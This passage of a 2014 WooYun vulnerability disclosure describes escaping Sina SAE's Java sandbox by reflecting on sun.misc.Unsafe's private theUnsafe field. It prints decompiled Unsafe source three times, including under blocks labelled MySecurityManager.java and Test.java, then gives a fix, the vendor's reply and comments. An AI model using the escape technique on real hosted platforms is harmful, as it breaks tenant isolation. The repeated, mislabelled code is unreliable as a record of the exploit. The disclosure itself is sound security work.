paramInt); } @Deprecated public void putBoolean(Object paramObject, int paramInt, boolean paramBoolean) { putBoolean(paramObject, paramInt, paramBoolean); } @Deprecated public byte getByte(Object paramObject, int paramInt) { return getByte(paramObject, paramInt); } @Deprecated public void putByte(Object paramObject, int paramInt, byte paramByte) { putByte(paramObject, paramInt, paramByte); } @Deprecated public short getShort(Object paramObject, int paramInt) { return getShort(paramObject, paramInt); } @Deprecated public void putShort(Object paramObject, int paramInt, short paramShort) { putShort(paramObject, paramInt, paramShort); } @Deprecated public char getChar(Object paramObject, int paramInt) { return getChar(paramObject, paramInt); } @Deprecated public void putChar(Object paramObject, int paramInt, char paramChar) { putChar(paramObject, paramInt, paramChar); } @Deprecated public long getLong(Object paramObject, int paramInt) { return getLong(paramObject, paramInt); } @Deprecated public void putLong(Object paramObject, int paramInt, long paramLong) { putLong(paramObject, paramInt, paramLong); } @Deprecated public float getFloat(Object paramObject, int paramInt) { return getFloat(paramObject, paramInt); } @Deprecated public void putFloat(Object paramObject, int paramInt, float paramFloat) { putFloat(paramObject, paramInt, paramFloat); } @Deprecated public double getDouble(Object paramObject, int paramInt) { return getDouble(paramObject, paramInt); } @Deprecated public void putDouble(Object paramObject, int paramInt, double paramDouble) { putDouble(paramObject, paramInt, paramDouble); } public native byte getByte(long paramLong); public native void putByte(long paramLong, byte paramByte); public native short getShort(long paramLong); public native void putShort(long paramLong, short paramShort); public native char getChar(long paramLong); public native void putChar(long paramLong, char paramChar); public native int getInt(long paramLong); public native void putInt(long paramLong, int paramInt); public native long getLong(long paramLong); public native void putLong(long paramLong1, long paramLong2); public native float getFloat(long paramLong); public native void putFloat(long paramLong, float paramFloat); public native double getDouble(long paramLong); public native void putDouble(long paramLong, double paramDouble); public native long getAddress(long paramLong); public native void putAddress(long paramLong1, long paramLong2); public native long allocateMemory(long paramLong); public native long reallocateMemory(long paramLong1, long paramLong2); public native void setMemory(long paramLong1, long paramLong2, byte paramByte); public native void copyMemory(Object paramObject1, long paramLong1, Object paramObject2, long paramLong2, long paramLong3); public void copyMemory(long paramLong1, long paramLong2, long paramLong3) { copyMemory(null, paramLong1, null, paramLong2, paramLong3); } public native void freeMemory(long paramLong); @Deprecated public int fieldOffset(Field paramField) { if (Modifier.isStatic(paramField.getModifiers())) { return (int)staticFieldOffset(paramField); } return (int)objectFieldOffset(paramField); } @Deprecated public Object staticFieldBase(Class paramClass) { Field[] arrayOfField = paramClass.getDeclaredFields(); for (int i = 0; i < arrayOfField.length; i++) { if (Modifier.isStatic(arrayOfField[i].getModifiers())) { return staticFieldBase(arrayOfField[i]); } } return null; } public native long staticFieldOffset(Field paramField); public native long objectFieldOffset(Field paramField); public native Object staticFieldBase(Field paramField); public native void ensureClassInitialized(Class paramClass); public native int arrayBaseOffset(Class paramClass); public native int arrayIndexScale(Class paramClass); public native int addressSize(); public native int pageSize(); public native Class defineClass(String paramString, byte[] paramArrayOfByte, int paramInt1, int paramInt2, ClassLoader paramClassLoader, ProtectionDomain paramProtectionDomain); public native Class defineClass(String paramString, byte[] paramArrayOfByte, int paramInt1, int paramInt2); public native Object allocateInstance(Class paramClass) throws InstantiationException; public native void monitorEnter(Object paramObject); public native void monitorExit(Object paramObject); public native boolean tryMonitorEnter(Object paramObject); public native void throwException(Throwable paramThrowable); public final native boolean compareAndSwapObject(Object paramObject1, long paramLong, Object paramObject2, Object paramObject3); public final native boolean compareAndSwapInt(Object paramObject, long paramLong, int paramInt1, int paramInt2); public final native boolean compareAndSwapLong(Object paramObject, long paramLong1, long paramLong2, long paramLong3); public native Object getObjectVolatile(Object paramObject, long paramLong); public native void putObjectVolatile(Object paramObject1, long paramLong, Object paramObject2); public native int getIntVolatile(Object paramObject, long paramLong); public native void putIntVolatile(Object paramObject, long paramLong, int paramInt); public native boolean getBooleanVolatile(Object paramObject, long paramLong); public native void putBooleanVolatile(Object paramObject, long paramLong, boolean paramBoolean); public native byte getByteVolatile(Object paramObject, long paramLong); public native void putByteVolatile(Object paramObject, long paramLong, byte paramByte); public native short getShortVolatile(Object paramObject, long paramLong); public native void putShortVolatile(Object paramObject, long paramLong, short paramShort); public native char getCharVolatile(Object paramObject, long paramLong); public native void putCharVolatile(Object paramObject, long paramLong, char paramChar); public native long getLongVolatile(Object paramObject, long paramLong); public native void putLongVolatile(Object paramObject, long paramLong1, long paramLong2); public native float getFloatVolatile(Object paramObject, long paramLong); public native void putFloatVolatile(Object paramObject, long paramLong, float paramFloat); public native double getDoubleVolatile(Object paramObject, long paramLong); public native void putDoubleVolatile(Object paramObject, long paramLong, double paramDouble); public native void putOrderedObject(Object paramObject1, long paramLong, Object paramObject2); public native void putOrderedInt(Object paramObject, long paramLong, int paramInt); public native void putOrderedLong(Object paramObject, long paramLong1, long paramLong2); public native void unpark(Object paramObject); public native void park(boolean paramBoolean, long paramLong); public native int getLoadAverage(double[] paramArrayOfDouble, int paramInt); static { registerNatives(); theUnsafe = new Unsafe(); } } 7 code 区域 sun.misc.Unsafe看名字就知道,不安全的.反编译的大致源码: package sun.misc; import java.lang.reflect.Field; import java.lang.reflect.Modifier; import java.security.ProtectionDomain; import sun.reflect.Reflection; public final class Unsafe { private static final Unsafe theUnsafe; public static final int INVALID_FIELD_OFFSET = -1; private static native void registerNatives(); public static Unsafe getUnsafe() { Class localClass = Reflection.getCallerClass(2); if (localClass.getClassLoader() != null) throw new SecurityException("Unsafe"); return theUnsafe; } public native int getInt(Object paramObject, long paramLong); public native void putInt(Object paramObject, long paramLong, int paramInt); public native Object getObject(Object paramObject, long paramLong); public native void putObject(Object paramObject1, long paramLong, Object paramObject2); public native boolean getBoolean(Object paramObject, long paramLong); public native void putBoolean(Object paramObject, long paramLong, boolean paramBoolean); public native byte getByte(Object paramObject, long paramLong); public native void putByte(Object paramObject, long paramLong, byte paramByte); public native short getShort(Object paramObject, long paramLong); public native void putShort(Object paramObject, long paramLong, short paramShort); public native char getChar(Object paramObject, long paramLong); public native void putChar(Object paramObject, long paramLong, char paramChar); public native long getLong(Object paramObject, long paramLong); public native void putLong(Object paramObject, long paramLong1, long paramLong2); public native float getFloat(Object paramObject, long paramLong); public native void putFloat(Object paramObject, long paramLong, float paramFloat); public native double getDouble(Object paramObject, long paramLong); public native void putDouble(Object paramObject, long paramLong, double paramDouble); @Deprecated public int getInt(Object paramObject, int paramInt) { return getInt(paramObject, paramInt); } @Deprecated public void putInt(Object paramObject, int paramInt1, int paramInt2) { putInt(paramObject, paramInt1, paramInt2); } @Deprecated public Object getObject(Object paramObject, int paramInt) { return getObject(paramObject, paramInt); } @Deprecated public void putObject(Object paramObject1, int paramInt, Object paramObject2) { putObject(paramObject1, paramInt, paramObject2); } @Deprecated public boolean getBoolean(Object paramObject, int paramInt) { return getBoolean(paramObject, paramInt); } @Deprecated public void putBoolean(Object paramObject, int paramInt, boolean paramBoolean) { putBoolean(paramObject, paramInt, paramBoolean); } @Deprecated public byte getByte(Object paramObject, int paramInt) { return getByte(paramObject, paramInt); } @Deprecated public void putByte(Object paramObject, int paramInt, byte paramByte) { putByte(paramObject, paramInt, paramByte); } @Deprecated public short getShort(Object paramObject, int paramInt) { return getShort(paramObject, paramInt); } @Deprecated public void putShort(Object paramObject, int paramInt, short paramShort) { putShort(paramObject, paramInt, paramShort); } @Deprecated public char getChar(Object paramObject, int paramInt) { return getChar(paramObject, paramInt); } @Deprecated public void putChar(Object paramObject, int paramInt, char paramChar) { putChar(paramObject, paramInt, paramChar); } @Deprecated public long getLong(Object paramObject, int paramInt) { return getLong(paramObject, paramInt); } @Deprecated public void putLong(Object paramObject, int paramInt, long paramLong) { putLong(paramObject, paramInt, paramLong); } @Deprecated public float getFloat(Object paramObject, int paramInt) { return getFloat(paramObject, paramInt); } @Deprecated public void putFloat(Object paramObject, int paramInt, float paramFloat) { putFloat(paramObject, paramInt, paramFloat); } @Deprecated public double getDouble(Object paramObject, int paramInt) { return getDouble(paramObject, paramInt); } @Deprecated public void putDouble(Object paramObject, int paramInt, double paramDouble) { putDouble(paramObject, paramInt, paramDouble); } public native byte getByte(long paramLong); public native void putByte(long paramLong, byte paramByte); public native short getShort(long paramLong); public native void putShort(long paramLong, short paramShort); public native char getChar(long paramLong); public native void putChar(long paramLong, char paramChar); public native int getInt(long paramLong); public native void putInt(long paramLong, int paramInt); public native long getLong(long paramLong); public native void putLong(long paramLong1, long paramLong2); public native float getFloat(long paramLong); public native void putFloat(long paramLong, float paramFloat); public native double getDouble(long paramLong); public native void putDouble(long paramLong, double paramDouble); public native long getAddress(long paramLong); public native void putAddress(long paramLong1, long paramLong2); public native long allocateMemory(long paramLong); public native long reallocateMemory(long paramLong1, long paramLong2); public native void setMemory(long paramLong1, long paramLong2, byte paramByte); public native void copyMemory(Object paramObject1, long paramLong1, Object paramObject2, long paramLong2, long paramLong3); public void copyMemory(long paramLong1, long paramLong2, long paramLong3) { copyMemory(null, paramLong1, null, paramLong2, paramLong3); } public native void freeMemory(long paramLong); @Deprecated public int fieldOffset(Field paramField) { if (Modifier.isStatic(paramField.getModifiers())) { return (int)staticFieldOffset(paramField); } return (int)objectFieldOffset(paramField); } @Deprecated public Object staticFieldBase(Class paramClass) { Field[] arrayOfField = paramClass.getDeclaredFields(); for (int i = 0; i < arrayOfField.length; i++) { if (Modifier.isStatic(arrayOfField[i].getModifiers())) { return staticFieldBase(arrayOfField[i]); } } return null; } public native long staticFieldOffset(Field paramField); public native long objectFieldOffset(Field paramField); public native Object staticFieldBase(Field paramField); public native void ensureClassInitialized(Class paramClass); public native int arrayBaseOffset(Class paramClass); public native int arrayIndexScale(Class paramClass); public native int addressSize(); public native int pageSize(); public native Class defineClass(String paramString, byte[] paramArrayOfByte, int paramInt1, int paramInt2, ClassLoader paramClassLoader, ProtectionDomain paramProtectionDomain); public native Class defineClass(String paramString, byte[] paramArrayOfByte, int paramInt1, int paramInt2); public native Object allocateInstance(Class paramClass) throws InstantiationException; public native void monitorEnter(Object paramObject); public native void monitorExit(Object paramObject); public native boolean tryMonitorEnter(Object paramObject); public native void throwException(Throwable paramThrowable); public final native boolean compareAndSwapObject(Object paramObject1, long paramLong, Object paramObject2, Object paramObject3); public final native boolean compareAndSwapInt(Object paramObject, long paramLong, int paramInt1, int paramInt2); public final native boolean compareAndSwapLong(Object paramObject, long paramLong1, long paramLong2, long paramLong3); public native Object getObjectVolatile(Object paramObject, long paramLong); public native void putObjectVolatile(Object paramObject1, long paramLong, Object paramObject2); public native int getIntVolatile(Object paramObject, long paramLong); public native void putIntVolatile(Object paramObject, long paramLong, int paramInt); public native boolean getBooleanVolatile(Object paramObject, long paramLong); public native void putBooleanVolatile(Object paramObject, long paramLong, boolean paramBoolean); public native byte getByteVolatile(Object paramObject, long paramLong); public native void putByteVolatile(Object paramObject, long paramLong, byte paramByte); public native short getShortVolatile(Object paramObject, long paramLong); public native void putShortVolatile(Object paramObject, long paramLong, short paramShort); public native char getCharVolatile(Object paramObject, long paramLong); public native void putCharVolatile(Object paramObject, long paramLong, char paramChar); public native long getLongVolatile(Object paramObject, long paramLong); public native void putLongVolatile(Object paramObject, long paramLong1, long paramLong2); public native float getFloatVolatile(Object paramObject, long paramLong); public native void putFloatVolatile(Object paramObject, long paramLong, float paramFloat); public native double getDoubleVolatile(Object paramObject, long paramLong); public native void putDoubleVolatile(Object paramObject, long paramLong, double paramDouble); public native void putOrderedObject(Object paramObject1, long paramLong, Object paramObject2); public native void putOrderedInt(Object paramObject, long paramLong, int paramInt); public native void putOrderedLong(Object paramObject, long paramLong1, long paramLong2); public native void unpark(Object paramObject); public native void park(boolean paramBoolean, long paramLong); public native int getLoadAverage(double[] paramArrayOfDouble, int paramInt); static { registerNatives(); theUnsafe = new Unsafe(); } } 8 MySecurityManager.java code 区域 sun.misc.Unsafe看名字就知道,不安全的.反编译的大致源码: package sun.misc; import java.lang.reflect.Field; import java.lang.reflect.Modifier; import java.security.ProtectionDomain; import sun.reflect.Reflection; public final class Unsafe { private static final Unsafe theUnsafe; public static final int INVALID_FIELD_OFFSET = -1; private static native void registerNatives(); public static Unsafe getUnsafe() { Class localClass = Reflection.getCallerClass(2); if (localClass.getClassLoader() != null) throw new SecurityException("Unsafe"); return theUnsafe; } public native int getInt(Object paramObject, long paramLong); public native void putInt(Object paramObject, long paramLong, int paramInt); public native Object getObject(Object paramObject, long paramLong); public native void putObject(Object paramObject1, long paramLong, Object paramObject2); public native boolean getBoolean(Object paramObject, long paramLong); public native void putBoolean(Object paramObject, long paramLong, boolean paramBoolean); public native byte getByte(Object paramObject, long paramLong); public native void putByte(Object paramObject, long paramLong, byte paramByte); public native short getShort(Object paramObject, long paramLong); public native void putShort(Object paramObject, long paramLong, short paramShort); public native char getChar(Object paramObject, long paramLong); public native void putChar(Object paramObject, long paramLong, char paramChar); public native long getLong(Object paramObject, long paramLong); public native void putLong(Object paramObject, long paramLong1, long paramLong2); public native float getFloat(Object paramObject, long paramLong); public native void putFloat(Object paramObject, long paramLong, float paramFloat); public native double getDouble(Object paramObject, long paramLong); public native void putDouble(Object paramObject, long paramLong, double paramDouble); @Deprecated public int getInt(Object paramObject, int paramInt) { return getInt(paramObject, paramInt); } @Deprecated public void putInt(Object paramObject, int paramInt1, int paramInt2) { putInt(paramObject, paramInt1, paramInt2); } @Deprecated public Object getObject(Object paramObject, int paramInt) { return getObject(paramObject, paramInt); } @Deprecated public void putObject(Object paramObject1, int paramInt, Object paramObject2) { putObject(paramObject1, paramInt, paramObject2); } @Deprecated public boolean getBoolean(Object paramObject, int paramInt) { return getBoolean(paramObject, paramInt); } @Deprecated public void putBoolean(Object paramObject, int paramInt, boolean paramBoolean) { putBoolean(paramObject, paramInt, paramBoolean); } @Deprecated public byte getByte(Object paramObject, int paramInt) { return getByte(paramObject, paramInt); } @Deprecated public void putByte(Object paramObject, int paramInt, byte paramByte) { putByte(paramObject, paramInt, paramByte); } @Deprecated public short getShort(Object paramObject, int paramInt) { return getShort(paramObject, paramInt); } @Deprecated public void putShort(Object paramObject, int paramInt, short paramShort) { putShort(paramObject, paramInt, paramShort); } @Deprecated public char getChar(Object paramObject, int paramInt) { return getChar(paramObject, paramInt); } @Deprecated public void putChar(Object paramObject, int paramInt, char paramChar) { putChar(paramObject, paramInt, paramChar); } @Deprecated public long getLong(Object paramObject, int paramInt) { return getLong(paramObject, paramInt); } @Deprecated public void putLong(Object paramObject, int paramInt, long paramLong) { putLong(paramObject, paramInt, paramLong); } @Deprecated public float getFloat(Object paramObject, int paramInt) { return getFloat(paramObject, paramInt); } @Deprecated public void putFloat(Object paramObject, int paramInt, float paramFloat) { putFloat(paramObject, paramInt, paramFloat); } @Deprecated public double getDouble(Object paramObject, int paramInt) { return getDouble(paramObject, paramInt); } @Deprecated public void putDouble(Object paramObject, int paramInt, double paramDouble) { putDouble(paramObject, paramInt, paramDouble); } public native byte getByte(long paramLong); public native void putByte(long paramLong, byte paramByte); public native short getShort(long paramLong); public native void putShort(long paramLong, short paramShort); public native char getChar(long paramLong); public native void putChar(long paramLong, char paramChar); public native int getInt(long paramLong); public native void putInt(long paramLong, int paramInt); public native long getLong(long paramLong); public native void putLong(long paramLong1, long paramLong2); public native float getFloat(long paramLong); public native void putFloat(long paramLong, float paramFloat); public native double getDouble(long paramLong); public native void putDouble(long paramLong, double paramDouble); public native long getAddress(long paramLong); public native void putAddress(long paramLong1, long paramLong2); public native long allocateMemory(long paramLong); public native long reallocateMemory(long paramLong1, long paramLong2); public native void setMemory(long paramLong1, long paramLong2, byte paramByte); public native void copyMemory(Object paramObject1, long paramLong1, Object paramObject2, long paramLong2, long paramLong3); public void copyMemory(long paramLong1, long paramLong2, long paramLong3) { copyMemory(null, paramLong1, null, paramLong2, paramLong3); } public native void freeMemory(long paramLong); @Deprecated public int fieldOffset(Field paramField) { if (Modifier.isStatic(paramField.getModifiers())) { return (int)staticFieldOffset(paramField); } return (int)objectFieldOffset(paramField); } @Deprecated public Object staticFieldBase(Class paramClass) { Field[] arrayOfField = paramClass.getDeclaredFields(); for (int i = 0; i < arrayOfField.length; i++) { if (Modifier.isStatic(arrayOfField[i].getModifiers())) { return staticFieldBase(arrayOfField[i]); } } return null; } public native long staticFieldOffset(Field paramField); public native long objectFieldOffset(Field paramField); public native Object staticFieldBase(Field paramField); public native void ensureClassInitialized(Class paramClass); public native int arrayBaseOffset(Class paramClass); public native int arrayIndexScale(Class paramClass); public native int addressSize(); public native int pageSize(); public native Class defineClass(String paramString, byte[] paramArrayOfByte, int paramInt1, int paramInt2, ClassLoader paramClassLoader, ProtectionDomain paramProtectionDomain); public native Class defineClass(String paramString, byte[] paramArrayOfByte, int paramInt1, int paramInt2); public native Object allocateInstance(Class paramClass) throws InstantiationException; public native void monitorEnter(Object paramObject); public native void monitorExit(Object paramObject); public native boolean tryMonitorEnter(Object paramObject); public native void throwException(Throwable paramThrowable); public final native boolean compareAndSwapObject(Object paramObject1, long paramLong, Object paramObject2, Object paramObject3); public final native boolean compareAndSwapInt(Object paramObject, long paramLong, int paramInt1, int paramInt2); public final native boolean compareAndSwapLong(Object paramObject, long paramLong1, long paramLong2, long paramLong3); public native Object getObjectVolatile(Object paramObject, long paramLong); public native void putObjectVolatile(Object paramObject1, long paramLong, Object paramObject2); public native int getIntVolatile(Object paramObject, long paramLong); public native void putIntVolatile(Object paramObject, long paramLong, int paramInt); public native boolean getBooleanVolatile(Object paramObject, long paramLong); public native void putBooleanVolatile(Object paramObject, long paramLong, boolean paramBoolean); public native byte getByteVolatile(Object paramObject, long paramLong); public native void putByteVolatile(Object paramObject, long paramLong, byte paramByte); public native short getShortVolatile(Object paramObject, long paramLong); public native void putShortVolatile(Object paramObject, long paramLong, short paramShort); public native char getCharVolatile(Object paramObject, long paramLong); public native void putCharVolatile(Object paramObject, long paramLong, char paramChar); public native long getLongVolatile(Object paramObject, long paramLong); public native void putLongVolatile(Object paramObject, long paramLong1, long paramLong2); public native float getFloatVolatile(Object paramObject, long paramLong); public native void putFloatVolatile(Object paramObject, long paramLong, float paramFloat); public native double getDoubleVolatile(Object paramObject, long paramLong); public native void putDoubleVolatile(Object paramObject, long paramLong, double paramDouble); public native void putOrderedObject(Object paramObject1, long paramLong, Object paramObject2); public native void putOrderedInt(Object paramObject, long paramLong, int paramInt); public native void putOrderedLong(Object paramObject, long paramLong1, long paramLong2); public native void unpark(Object paramObject); public native void park(boolean paramBoolean, long paramLong); public native int getLoadAverage(double[] paramArrayOfDouble, int paramInt); static { registerNatives(); theUnsafe = new Unsafe(); } } 9 Test.java code 区域 看到我们是无法去new这个类的,但是看到最后几行: static { registerNatives(); theUnsafe = new Unsafe(); } 默认是由于自己初始化的,它有个 (private static final Unsafe theUnsafe;)theUnsafe属性,那我们可以用反射去调用它了. 0 修复方案: 最好限制这个包:sun.misc.*访问!(由于百度BAE欠费,就没测试它.至于GAE,我相信他们是禁用了这个类) 版权声明:转载请注明来源 Nebula@乌云 漏洞回应 厂商回应: 危害等级:高 漏洞Rank:10 确认时间:2014-08-19 20:37 厂商回复: 感谢对新浪安全工作的支持,漏洞正在修复。 最新状态: 暂无 漏洞评价: 对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值 漏洞评价(共0人评价): 登陆后才能进行评分 评价 2014-08-17 00:34 | U神 ( 核心白帽子 | Rank:1375 漏洞数:152 | 乌云核心菜鸟,此号处于联盟托管中....) 0 关注但不发表评论 1# 回复此人 2014-08-17 00:40 | Haswell ( 普通白帽子 | Rank:182 漏洞数:19 | HorizonSec @ RDFZ) 0 前排 2# 回复此人 2014-08-17 05:37 | 天朝城管 ( 普通白帽子 | Rank:136 漏洞数:39 | 不要等到命玩你的时候才开始玩命) 0 围观 3# 回复此人 2014-08-17 08:21 | 小小泥娃 ( 路人 | Rank:20 漏洞数:4 | 高二) 0 前排 4# 回复此人 2014-08-17 09:19 | 小杨 ( 路人 | Rank:22 漏洞数:4 | 。) 0 瓜子花生胡豆 5# 回复此人 2014-08-17 10:10 | 一只猿 ( 普通白帽子 | Rank:560 漏洞数:98 | 硬件与无线通信研究方向) 0 火钳留名 6# 回复此人 2014-08-17 10:53 | Sct7p ( 实习白帽子 | Rank:62 漏洞数:9 | 懂与不懂之间只隔了一层纸,懂的人会觉得很...) 0 新浪sae提权手册,五块钱一本 7# 回复此人 2014-08-17 11:05 | Jack.Chalres ( 实习白帽子 | Rank:39 漏洞数:15 | ..............) 0 前排 8# 回复此人 2014-08-17 12:06 | 无敌L.t.H ( 路人 | Rank:21 漏洞数:4 | ……肉肉捉活,亭长放解) 0 坐等渣浪无良小编 9# 回复此人 2014-08-17 12:36 | Jack.HF ( 路人 | Rank:24 漏洞数:5 | 随便玩玩) 0 大牛 10# 回复此人 2014-09-11 10:12 | wefgod ( 核心白帽子 | Rank:1829 漏洞数:183 | 力不从心) 0 这个很给力啊 11# 回复此人 2014-09-18 21:59 | HackPanda ( 普通白帽子 | Rank:117 漏洞数:16 | Talk is cheap,show me the shell.) 0 真棒这个 学习了 12# 回复此人 2014-09-29 15:48 | ToySweet ( 实习白帽子 | Rank:36 漏洞数:8 | 做有道德的安全研究员。) 0 啊 炸了 13# 回复此人 2014-10-01 11:24 | 廷廷 ( 路人 | Rank:0 漏洞数:1 | 有很强的好奇心,爱好广泛,求女女带走。。...) 0 这不是xcon演讲上的东西吗··· 14# 回复此人 2014-10-01 13:22 | Nebula ( 普通白帽子 | Rank:223 漏洞数:23 | xxxxx) 0 @廷廷 xcon?谁讲的,有地址吗? 也是利用内存堆喷射技巧? 15# 回复此人 免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。 点赞 https://cn-sec.com/archives/22801.html 复制链接 复制链接 左青龙 微信扫一扫 右白虎 微信扫一扫
评论